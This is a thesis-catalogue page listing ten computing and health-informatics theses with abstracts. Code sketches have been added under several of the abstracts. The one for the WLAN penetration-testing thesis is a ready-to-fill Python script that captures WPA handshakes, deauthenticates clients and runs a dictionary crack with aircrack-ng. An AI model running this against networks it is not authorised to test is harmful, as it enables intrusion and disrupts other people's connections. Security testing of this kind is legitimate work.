About

The Global ETD Search service is a free service for researchers to find electronic theses and dissertations. This service is provided by the Networked Digital Library of Theses and Dissertations.

Our metadata is collected from universities around the world. If you manage a university/consortium/country archive and want to be added, details can be found on the NDLTD website.
801

Penetrationstest av WLAN : med brute force av WEP, WPA, WPA2 och WPS

Eklund Berggren, Oscar January 2020 (has links)
At a time when the number of computers, mobile phones, and other devices that can connect to a WLAN is large, the security of these WLANs plays a major role. What separates WLANs from LANs when it comes to security is that the information must travel wirelessly through the air, which means that unauthorized parties can eavesdrop on the traffic or attempt to connect to the wireless network. The choice and implementation of WLAN encryption, for SMEs and private individuals alike, has a large impact on the security of the WLAN. How easy is it for an unauthorized person to break into a WLAN? This study tests WLANs that use WEP, WPA/WPA2 PSK, and WPS by means of a brute-force attack, in order to determine whether these encryption protocols are suitable to use. The test is simulated with an unauthorized laptop that attempts to break into WLANs using WEP, WPA/WPA2 PSK, and WPS via brute force. Tools such as aircrack-ng and airgeddon are used to carry out the tests.
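The brute-force workflow the thesis simulates follows the standard aircrack-ng pattern: capture a WPA 4-way handshake, then run a dictionary attack against it. Below is a minimal sketch of that pattern driven from Python via subprocess; the interface name, BSSID, channel, and wordlist are placeholders, and the thesis's exact airgeddon-driven procedure is not reproduced here.

```python
import subprocess
import time

IFACE = "wlan0mon"           # monitor-mode interface (placeholder name)
BSSID = "AA:BB:CC:DD:EE:FF"  # target access point MAC (placeholder)
CHANNEL = "6"
WORDLIST = "wordlist.txt"    # candidate passphrases for the brute force

# 1. Capture traffic on the target channel, including the WPA 4-way
#    handshake, writing packets to capture-01.cap.
dump = subprocess.Popen(
    ["airodump-ng", "-c", CHANNEL, "--bssid", BSSID, "-w", "capture", IFACE]
)

# 2. Deauthenticate connected clients so they re-associate and a fresh
#    handshake can be captured.
subprocess.run(["aireplay-ng", "--deauth", "5", "-a", BSSID, IFACE], check=False)

time.sleep(60)    # capture window
dump.terminate()

# 3. Run the dictionary attack against the captured handshake.
subprocess.run(["aircrack-ng", "-w", WORDLIST, "-b", BSSID, "capture-01.cap"])
```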
802

Fine grain mapping strategies for pipelined computer systems

Shieh, Jong-Jiann January 1990 (has links)
No description available.
803

Predicting Myocardial Infarction using Textual Prehospital Data and Machine Learning

Van der Haas, Yvette Jane January 2021 (has links)
A major healthcare problem is the overcrowding of hospitals and emergency departments, which leads to negative patient outcomes and increased costs. In a previous study, performed by Leiden University Medical Centre, a new and innovative prehospital triage method was developed in which two nurse paramedics could consult a cardiologist for patients with cardiac symptoms via a live connection on a digital triage platform. The developed triage method resulted in a recall of 0.995 and a specificity of 0.0113. This study raises the following research question: 'Would there be enough (good) information gathered at the prehospital scene to enable a machine learning model to predict myocardial infarction?'. Testing different pre-processing steps, several feature sets (premade and self-made), multiple models (Support Vector Machine, K Nearest Neighbour, Logistic Regression and Random Forest), and various outcome settings and hyperparameters led to the final results: recall = 0.995 and specificity = 0.1101. These were obtained with the features selected by a cardiologist and the Support Vector Machine model. The outcomes were checked with an extra explainability layer named Explain Like I'm Five, which illustrates that the resulting machine learning model is trained mostly on the right words and characters.
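For context, the reported metric pair combines recall (sensitivity) with specificity, which has to be derived from the confusion matrix since scikit-learn offers no direct specificity scorer. Below is a minimal sketch of the shape of the winning configuration (text features into an SVM); the TF-IDF step, toy notes, and labels are invented placeholders, not the study's actual pipeline or data.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.metrics import confusion_matrix, recall_score

# Toy stand-ins for prehospital free-text notes (placeholders).
notes = [
    "chest pain radiating to left arm, sweating",
    "pressure on chest, short of breath",
    "crushing chest pain, nausea",
    "chest discomfort during exertion",
    "sprained ankle after fall",
    "mild headache since morning",
    "seasonal cough, no fever",
    "lower back pain after lifting",
]
labels = [1, 1, 1, 1, 0, 0, 0, 0]  # 1 = myocardial infarction, 0 = other

X = TfidfVectorizer().fit_transform(notes)
X_train, X_test, y_train, y_test = train_test_split(
    X, labels, test_size=0.25, stratify=labels, random_state=0
)

clf = SVC(class_weight="balanced").fit(X_train, y_train)
pred = clf.predict(X_test)

tn, fp, fn, tp = confusion_matrix(y_test, pred, labels=[0, 1]).ravel()
print("recall (sensitivity):", recall_score(y_test, pred))  # TP / (TP + FN)
print("specificity:", tn / (tn + fp))                       # TN / (TN + FP)
```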
804

Access compatibility for shared logical resources

Rypka, David Jerome January 1982 (has links)
No description available.
805

The use of mental models to affect quality in human-computer interactions

Coovert, Michael David January 1985 (has links)
No description available.
806

An associatively controlled functional multiprocessor for real-time applications

Ebner, George Chester January 1972 (has links)
No description available.
807

Utvecklares upplevelser av enhetstester

Lindberg, Robert, Thysell, Oskar January 2022 (has links)
The purpose of this study has been to investigate the challenges developers experience when working with unit tests. Unit tests are test code written to verify that production code, so-called regular code, works correctly and fulfils its purpose; this type of testing is done first in the development process to guarantee that the code maintains good quality. The study was carried out by having five developers at an IT consulting company in Luleå participate in individual open qualitative interviews, where they answered questions about their experiences of working with unit tests. The study concludes that many of the problems identified here are consistent with previous research on the topic. These problems were mainly of a technical nature; maintenance, knowing what to test, and knowing when one has tested enough were among the most commonly shared, which shows that these problems still exist today. The study also found that a lack of training in unit testing is common, and that the lack of a common method, especially in combination with the lack of training, worsens the problems that already exist. With the help of the study's qualitative approach, some potential contributing factors behind these perceived problems have been identified, and based on these conclusions, recommendations have been formulated for organizations and for further research.
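To make the object of study concrete, here is a minimal illustration of a unit test in the sense the abstract uses: a small test that verifies one piece of production code in isolation (pytest-style; the function under test is hypothetical).

```python
import pytest

# Production code under test (hypothetical example).
def apply_discount(price: float, percent: float) -> float:
    """Return price reduced by `percent` percent."""
    if not 0 <= percent <= 100:
        raise ValueError("percent must be between 0 and 100")
    return price * (1 - percent / 100)

# The unit tests: each verifies one behaviour of the unit in isolation.
def test_apply_discount_reduces_price():
    assert apply_discount(200.0, 25.0) == 150.0

def test_apply_discount_rejects_invalid_percent():
    with pytest.raises(ValueError):
        apply_discount(100.0, 150.0)
```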
808

Efficient and Cost-effective Workflow Based on Containers for Distributed Reproducible Experiments

Perera, Shelan January 2016 (has links)
Reproducing distributed experiments is a challenging task for many researchers, and several factors make the problem hard to solve. To reproduce distributed experiments, researchers need to perform complex deployments involving many dependent software stacks, many configurations, and manual orchestration. They must also allocate a larger amount of money for clusters of machines and then spend their valuable time performing the experiments. Furthermore, validating a distributed scenario in a real environment takes a lot of time, as most pseudo-distributed systems do not exhibit the characteristics of a real distributed system. Karamel addresses the inconvenience of manual orchestration by providing a comprehensive orchestration platform to deploy and run distributed experiments. Still, this solution may incur expenses similar to those of a manual distributed setup, since it uses virtual machines underneath, and it does not provide quick validation of a distributed setup with a fast feedback loop, as terminating and provisioning new virtual machines takes considerable time. We therefore provide a solution by integrating Docker so that it coexists seamlessly with the virtual-machine-based deployment model. Our solution encapsulates a container-based deployment model that lets users reproduce distributed experiments in a cost-effective and efficient manner. In this project, we introduce a novel container-based deployment model that is not possible with the conventional virtual-machine-based model. Further, we evaluate our solution with a real deployment of the Apache Hadoop TeraSort experiment, a benchmark for the Apache Hadoop MapReduce platform, to explain how this model can be used to save cost and improve efficiency.
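The cost argument rests on containers being far faster and cheaper to provision than virtual machines. A minimal sketch of that container-based model using the Docker SDK for Python is shown below; the image name and command are placeholders, and Karamel's actual orchestration is not reproduced here.

```python
import docker

client = docker.from_env()

# Containers start in seconds, so an experiment "cluster" can be created and
# torn down far faster (and cheaper) than provisioning virtual machines.
nodes = [
    client.containers.run(
        "hadoop-node:latest",  # hypothetical experiment image
        name=f"worker-{i}",
        detach=True,
    )
    for i in range(3)
]

# Run the experiment driver inside one container and collect its output.
result = nodes[0].exec_run("hadoop version")  # placeholder command
print(result.output.decode())

# Tear the cluster down cheaply after the run.
for node in nodes:
    node.remove(force=True)
```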
809

Window-based Cost-effective Auto-scaling Solution with Optimized Scale-in Strategy

Perera, Ashansa January 2016 (has links)
Auto-scaling is a major way of minimizing the gap between the demand for and the availability of computing resources for applications with dynamic workloads. Even though much effort has gone into addressing the auto-scaling requirements of distributed systems, most available solutions are application-specific and consider only application-level requirements. Today, with the pay-as-you-go model of cloud computing, cloud providers offer many different price plans, which makes resource price an important decision-making criterion at the time of auto-scaling. One major step is using spot instances, which are more advantageous in terms of cost for elasticity. However, using spot instances for auto-scaling must be handled carefully to avoid their drawbacks, since infrastructure providers can terminate spot instances at any time. Although some cloud providers, such as Amazon Web Services and Google Compute Engine, have their own auto-scaling solutions, those solutions do not pursue cost-effectiveness as a goal. In this work, we introduce an auto-scaling solution targeted at middle layers between the cloud and the application, such as Karamel. Our work combines minimizing the cost of the deployment with maintaining the demand for resources. Our solution is a rule-based system built on top of resource-utilization metrics as a more general measure of workload. Furthermore, machine terminations and the billing periods of instances are taken into account as cloud source events. Strategies such as window-based profiling, dynamic event profiling, and an optimized scale-in strategy are used to achieve our main goal of providing a cost-effective auto-scaling solution for cloud-based deployments. With the help of our simulation methodology, we explore the parameter space to find the best values under different workloads. Moreover, our cloud-based experiments show that our solution performs much more economically compared to the available cloud-based auto-scaling solutions.
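The core mechanism, rule-based decisions over a sliding utilization window with scale-in deferred toward the end of a paid billing period, can be sketched in a few lines. The thresholds, window length, and billing period below are illustrative assumptions; the thesis tunes such parameters via simulation.

```python
from collections import deque

WINDOW = 6               # recent utilization samples to average over
SCALE_OUT_AT = 0.80      # average utilization above this -> add an instance
SCALE_IN_AT = 0.30       # average utilization below this -> removal candidate
BILLING_PERIOD_S = 3600  # assumed hourly billing period
GRACE_S = 300            # only scale in within this window before renewal

samples = deque(maxlen=WINDOW)

def decide(utilization: float, seconds_into_period: float) -> str:
    """Return a scaling decision based on a sliding utilization window."""
    samples.append(utilization)
    avg = sum(samples) / len(samples)
    if avg > SCALE_OUT_AT:
        return "scale-out"
    # Optimized scale-in: an instance is already paid for until the end of
    # its billing period, so only release it shortly before the next charge.
    if avg < SCALE_IN_AT and BILLING_PERIOD_S - seconds_into_period <= GRACE_S:
        return "scale-in"
    return "hold"

for util, t in [(0.9, 100), (0.2, 3400), (0.2, 3500)]:
    print(decide(util, t))
```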
810

High performance shared state schedulers

Kouzoupis, Antonios January 2016 (has links)
Large organizations and research institutes store a huge volume of data nowadays. In order to gain any valuable insights, distributed processing frameworks running over a cluster of computers are needed. Apache Hadoop is the prominent framework for distributed storage and data processing. At SICS Swedish ICT we are building Hops, a new distribution of Apache Hadoop that relies on a distributed, highly available MySQL Cluster NDB to improve performance. Hops-YARN is the resource-management framework of Hops; it introduces distributed resource management, load-balancing the tracking of resources in a cluster. In Hops-YARN we make heavy use of the back-end database, storing all the ResourceManager metadata and incoming RPCs to provide high fault tolerance and very short recovery time. Furthermore, the NDB cluster's Event API is used so that the ResourceManager can communicate with the distributed ResourceTrackers. This project aims at optimizing the mechanisms used for persisting metadata in NDB, both in terms of transactional commit time and in terms of pre-processing the metadata. Under no condition should the in-memory ResourceManager state diverge from the state stored in NDB. With these goals in mind, several solutions were examined that improved the performance of the system, making Hops-YARN comparable to Apache YARN with the extra benefits of high fault tolerance and short recovery time. The solutions proposed in this thesis improve the pure commit time of a transaction to the MySQL Cluster as well as the pre-processing and parallelism of our Transaction Manager. The results indicate that the performance of Hops increased dramatically, utilizing more resources on a cluster with thousands of machines. Increasing cluster utilization by a few per cent can save organizations a large amount of money.
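One idea behind reducing commit time is amortization: grouping many small metadata updates into a single transaction instead of committing each one. The toy benchmark below illustrates that effect, with SQLite standing in for MySQL Cluster NDB and a hypothetical schema; it demonstrates the principle, not Hops-YARN's actual Transaction Manager.

```python
import sqlite3
import time

# SQLite stands in for MySQL Cluster NDB; the schema is hypothetical.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE rm_state (node TEXT, heartbeat REAL)")
updates = [(f"node-{i}", time.time()) for i in range(10_000)]

# One commit per update: pays the transaction overhead 10,000 times.
t0 = time.perf_counter()
for row in updates:
    db.execute("INSERT INTO rm_state VALUES (?, ?)", row)
    db.commit()
per_row = time.perf_counter() - t0

# Batched: one transaction covers the whole window of updates.
t0 = time.perf_counter()
db.executemany("INSERT INTO rm_state VALUES (?, ?)", updates)
db.commit()
batched = time.perf_counter() - t0

print(f"per-row commits: {per_row:.3f}s  batched: {batched:.3f}s")
```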
